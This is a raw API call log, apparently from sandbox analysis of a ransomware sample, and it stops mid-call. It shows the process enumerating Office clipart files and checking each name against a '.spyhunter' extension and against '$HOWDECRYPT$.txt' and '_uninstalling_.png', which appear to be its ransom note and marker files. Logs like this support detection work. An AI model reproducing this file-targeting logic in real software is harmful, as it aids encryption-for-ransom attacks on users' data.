lstrcmpW (lpString1="J0152600.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.389] lstrcmpW (lpString1="J0152600.WMF", lpString2="_uninstalling_.png") returned 1 [0098.389] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152600.WMF") returned 67 [0098.389] GetProcessHeap () returned 0x2c0000 [0098.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c23388 [0098.389] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2890) returned 0x2c249b0 [0098.389] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.389] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF") returned 67 [0098.389] StrStrIW (lpFirst="J0152602.WMF", lpSrch=".spyhunter") returned 0x0 [0098.389] lstrcmpW (lpString1="J0152602.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.389] lstrcmpW (lpString1="J0152602.WMF", lpString2="_uninstalling_.png") returned 1 [0098.390] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152602.WMF") returned 67 [0098.390] GetProcessHeap () returned 0x2c0000 [0098.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c23458 [0098.390] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2898) returned 0x2c249b0 [0098.390] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.390] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF") returned 67 [0098.390] StrStrIW (lpFirst="J0152606.WMF", lpSrch=".spyhunter") returned 0x0 [0098.390] lstrcmpW (lpString1="J0152606.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.390] lstrcmpW (lpString1="J0152606.WMF", lpString2="_uninstalling_.png") returned 1 [0098.390] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152606.WMF") returned 67 [0098.390] GetProcessHeap () returned 0x2c0000 [0098.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c23528 [0098.390] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x28a0) returned 0x2c249b0 [0098.390] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.390] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 67 [0098.390] StrStrIW (lpFirst="J0152608.WMF", lpSrch=".spyhunter") returned 0x0 [0098.390] lstrcmpW (lpString1="J0152608.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.390] lstrcmpW (lpString1="J0152608.WMF", lpString2="_uninstalling_.png") returned 1 [0098.390] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152608.WMF") returned 67 [0098.390] GetProcessHeap () returned 0x2c0000 [0098.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c235f8 [0098.391] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x28a8) returned 0x2c249b0 [0098.391] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.391] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 67 [0098.391] StrStrIW (lpFirst="J0152610.WMF", lpSrch=".spyhunter") returned 0x0 [0098.391] lstrcmpW (lpString1="J0152610.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.391] lstrcmpW (lpString1="J0152610.WMF", lpString2="_uninstalling_.png") returned 1 [0098.391] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152610.WMF") returned 67 [0098.391] GetProcessHeap () returned 0x2c0000 [0098.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c236c8 [0098.391] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x28b0) returned 0x2c249b0 [0098.391] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.391] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF") returned 67 [0098.391] StrStrIW (lpFirst="J0152622.WMF", lpSrch=".spyhunter") returned 0x0 [0098.391] lstrcmpW (lpString1="J0152622.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.391] lstrcmpW (lpString1="J0152622.WMF", lpString2="_uninstalling_.png") returned 1 [0098.391] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152622.WMF") returned 67 [0098.391] GetProcessHeap () returned 0x2c0000 [0098.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c23798 [0098.392] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x28b8) returned 0x2c249b0 [0098.392] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.392] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF") returned 67 [0098.392] StrStrIW (lpFirst="J0152626.WMF", lpSrch=".spyhunter") returned 0x0 [0098.392] lstrcmpW (lpString1="J0152626.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.392] lstrcmpW (lpString1="J0152626.WMF", lpString2="_uninstalling_.png") returned 1 [0098.392] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152626.WMF") returned 67 [0098.392] GetProcessHeap () returned 0x2c0000 [0098.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c23868 [0098.392] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x28c0) returned 0x2c249b0 [0098.392] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.392] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF") returned 67 [0098.392] StrStrIW (lpFirst="J0152628.WMF", lpSrch=".spyhunter") returned 0x0 [0098.392] lstrcmpW (lpString1="J0152628.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.392] lstrcmpW (lpString1="J0152628.WMF", lpString2="_uninstalling_.png") returned 1 [0098.392] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF") returned 67 [0098.392] GetProcessHeap () returned 0x2c0000 [0098.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c23938 [0098.393] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x28c8) returned 0x2c249b0 [0098.393] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.393] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 67 [0098.393] StrStrIW (lpFirst="J0152688.WMF", lpSrch=".spyhunter") returned 0x0 [0098.393] lstrcmpW (lpString1="J0152688.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.393] lstrcmpW (lpString1="J0152688.WMF", lpString2="_uninstalling_.png") returned 1 [0098.393] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned 67 [0098.393] GetProcessHeap () returned 0x2c0000 [0098.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c23a08 [0098.393] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x28d0) returned 0x2c249b0 [0098.393] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.393] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF") returned 67 [0098.393] StrStrIW (lpFirst="J0152690.WMF", lpSrch=".spyhunter") returned 0x0 [0098.393] lstrcmpW (lpString1="J0152690.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.393] lstrcmpW (lpString1="J0152690.WMF", lpString2="_uninstalling_.png") returned 1 [0098.393] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF") returned 67 [0098.393] GetProcessHeap () returned 0x2c0000 [0098.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c23ad8 [0098.393] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x28d8) returned 0x2c249b0 [0098.394] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.394] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 67 [0098.394] StrStrIW (lpFirst="J0152694.WMF", lpSrch=".spyhunter") returned 0x0 [0098.394] lstrcmpW (lpString1="J0152694.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.394] lstrcmpW (lpString1="J0152694.WMF", lpString2="_uninstalling_.png") returned 1 [0098.394] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned 67 [0098.394] GetProcessHeap () returned 0x2c0000 [0098.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c23ba8 [0098.394] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x28e0) returned 0x2c249b0 [0098.394] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.394] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF") returned 67 [0098.394] StrStrIW (lpFirst="J0152696.WMF", lpSrch=".spyhunter") returned 0x0 [0098.394] lstrcmpW (lpString1="J0152696.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.394] lstrcmpW (lpString1="J0152696.WMF", lpString2="_uninstalling_.png") returned 1 [0098.394] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152696.WMF") returned 67 [0098.394] GetProcessHeap () returned 0x2c0000 [0098.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c23c78 [0098.395] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x28e8) returned 0x2c249b0 [0098.395] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.395] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF") returned 67 [0098.395] StrStrIW (lpFirst="J0152698.WMF", lpSrch=".spyhunter") returned 0x0 [0098.395] lstrcmpW (lpString1="J0152698.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.395] lstrcmpW (lpString1="J0152698.WMF", lpString2="_uninstalling_.png") returned 1 [0098.395] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF") returned 67 [0098.395] GetProcessHeap () returned 0x2c0000 [0098.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c23d48 [0098.395] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x28f0) returned 0x2c249b0 [0098.395] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.395] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF") returned 67 [0098.395] StrStrIW (lpFirst="J0152702.WMF", lpSrch=".spyhunter") returned 0x0 [0098.395] lstrcmpW (lpString1="J0152702.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.395] lstrcmpW (lpString1="J0152702.WMF", lpString2="_uninstalling_.png") returned 1 [0098.395] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152702.WMF") returned 67 [0098.395] GetProcessHeap () returned 0x2c0000 [0098.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c23e18 [0098.395] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x28f8) returned 0x2c249b0 [0098.396] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.396] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF") returned 67 [0098.396] StrStrIW (lpFirst="J0152704.WMF", lpSrch=".spyhunter") returned 0x0 [0098.396] lstrcmpW (lpString1="J0152704.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.396] lstrcmpW (lpString1="J0152704.WMF", lpString2="_uninstalling_.png") returned 1 [0098.396] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152704.WMF") returned 67 [0098.396] GetProcessHeap () returned 0x2c0000 [0098.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c23ee8 [0098.396] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2900) returned 0x2c249b0 [0098.396] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.396] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF") returned 67 [0098.396] StrStrIW (lpFirst="J0152708.WMF", lpSrch=".spyhunter") returned 0x0 [0098.396] lstrcmpW (lpString1="J0152708.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.396] lstrcmpW (lpString1="J0152708.WMF", lpString2="_uninstalling_.png") returned 1 [0098.396] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF") returned 67 [0098.396] GetProcessHeap () returned 0x2c0000 [0098.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c23fb8 [0098.396] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2908) returned 0x2c249b0 [0098.396] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.397] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 67 [0098.397] StrStrIW (lpFirst="J0152716.WMF", lpSrch=".spyhunter") returned 0x0 [0098.397] lstrcmpW (lpString1="J0152716.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.397] lstrcmpW (lpString1="J0152716.WMF", lpString2="_uninstalling_.png") returned 1 [0098.397] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 67 [0098.397] GetProcessHeap () returned 0x2c0000 [0098.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c24088 [0098.397] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2910) returned 0x2c249b0 [0098.397] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.403] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF") returned 67 [0098.407] StrStrIW (lpFirst="J0152722.WMF", lpSrch=".spyhunter") returned 0x0 [0098.407] lstrcmpW (lpString1="J0152722.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.407] lstrcmpW (lpString1="J0152722.WMF", lpString2="_uninstalling_.png") returned 1 [0098.407] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152722.WMF") returned 67 [0098.407] GetProcessHeap () returned 0x2c0000 [0098.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c29048 [0098.407] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2910) returned 0x2c249b0 [0098.407] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.408] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF") returned 67 [0098.408] StrStrIW (lpFirst="J0152876.WMF", lpSrch=".spyhunter") returned 0x0 [0098.408] lstrcmpW (lpString1="J0152876.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.408] lstrcmpW (lpString1="J0152876.WMF", lpString2="_uninstalling_.png") returned 1 [0098.408] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152876.WMF") returned 67 [0098.408] GetProcessHeap () returned 0x2c0000 [0098.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c24158 [0098.408] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2918) returned 0x2c249b0 [0098.408] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.408] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 67 [0098.408] StrStrIW (lpFirst="J0152878.WMF", lpSrch=".spyhunter") returned 0x0 [0098.408] lstrcmpW (lpString1="J0152878.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.408] lstrcmpW (lpString1="J0152878.WMF", lpString2="_uninstalling_.png") returned 1 [0098.408] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152878.WMF") returned 67 [0098.408] GetProcessHeap () returned 0x2c0000 [0098.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c24228 [0098.408] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2920) returned 0x2c249b0 [0098.408] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.409] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 67 [0098.409] StrStrIW (lpFirst="J0152882.WMF", lpSrch=".spyhunter") returned 0x0 [0098.409] lstrcmpW (lpString1="J0152882.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.409] lstrcmpW (lpString1="J0152882.WMF", lpString2="_uninstalling_.png") returned 1 [0098.409] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152882.WMF") returned 67 [0098.409] GetProcessHeap () returned 0x2c0000 [0098.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c242f8 [0098.409] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2928) returned 0x2c249b0 [0098.409] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.409] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF") returned 67 [0098.409] StrStrIW (lpFirst="J0152884.WMF", lpSrch=".spyhunter") returned 0x0 [0098.409] lstrcmpW (lpString1="J0152884.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.409] lstrcmpW (lpString1="J0152884.WMF", lpString2="_uninstalling_.png") returned 1 [0098.409] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152884.WMF") returned 67 [0098.409] GetProcessHeap () returned 0x2c0000 [0098.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c243c8 [0098.409] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2930) returned 0x2c249b0 [0098.409] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.409] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF") returned 67 [0098.410] StrStrIW (lpFirst="J0152890.WMF", lpSrch=".spyhunter") returned 0x0 [0098.410] lstrcmpW (lpString1="J0152890.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.410] lstrcmpW (lpString1="J0152890.WMF", lpString2="_uninstalling_.png") returned 1 [0098.410] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152890.WMF") returned 67 [0098.410] GetProcessHeap () returned 0x2c0000 [0098.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c24498 [0098.410] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2938) returned 0x2c249b0 [0098.410] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.410] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 67 [0098.410] StrStrIW (lpFirst="J0152892.WMF", lpSrch=".spyhunter") returned 0x0 [0098.410] lstrcmpW (lpString1="J0152892.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.410] lstrcmpW (lpString1="J0152892.WMF", lpString2="_uninstalling_.png") returned 1 [0098.410] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152892.WMF") returned 67 [0098.410] GetProcessHeap () returned 0x2c0000 [0098.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c24568 [0098.410] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2940) returned 0x2c249b0 [0098.410] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.410] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 67 [0098.410] StrStrIW (lpFirst="J0152894.WMF", lpSrch=".spyhunter") returned 0x0 [0098.411] lstrcmpW (lpString1="J0152894.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.411] lstrcmpW (lpString1="J0152894.WMF", lpString2="_uninstalling_.png") returned 1 [0098.411] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152894.WMF") returned 67 [0098.411] GetProcessHeap () returned 0x2c0000 [0098.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c24638 [0098.411] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2948) returned 0x2c249b0 [0098.411] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.411] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 67 [0098.411] StrStrIW (lpFirst="J0152898.WMF", lpSrch=".spyhunter") returned 0x0 [0098.411] lstrcmpW (lpString1="J0152898.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.411] lstrcmpW (lpString1="J0152898.WMF", lpString2="_uninstalling_.png") returned 1 [0098.411] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152898.WMF") returned 67 [0098.411] GetProcessHeap () returned 0x2c0000 [0098.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c24708 [0098.411] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2950) returned 0x2c249b0 [0098.411] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.411] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 67 [0098.411] StrStrIW (lpFirst="J0153047.WMF", lpSrch=".spyhunter") returned 0x0 [0098.412] lstrcmpW (lpString1="J0153047.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.412] lstrcmpW (lpString1="J0153047.WMF", lpString2="_uninstalling_.png") returned 1 [0098.412] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153047.WMF") returned 67 [0098.412] GetProcessHeap () returned 0x2c0000 [0098.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c247d8 [0098.412] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2958) returned 0x2c249b0 [0098.412] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.412] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0153087.WMF") returned 67 [0098.412] StrStrIW (lpFirst="J0153087.WMF", lpSrch=".spyhunter") returned 0x0 [0098.412] lstrcmpW (lpString1="J0153087.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.412] lstrcmpW (lpString1="J0153087.WMF", lpString2="_uninstalling_.png") returned 1 [0098.412] lstrlenW 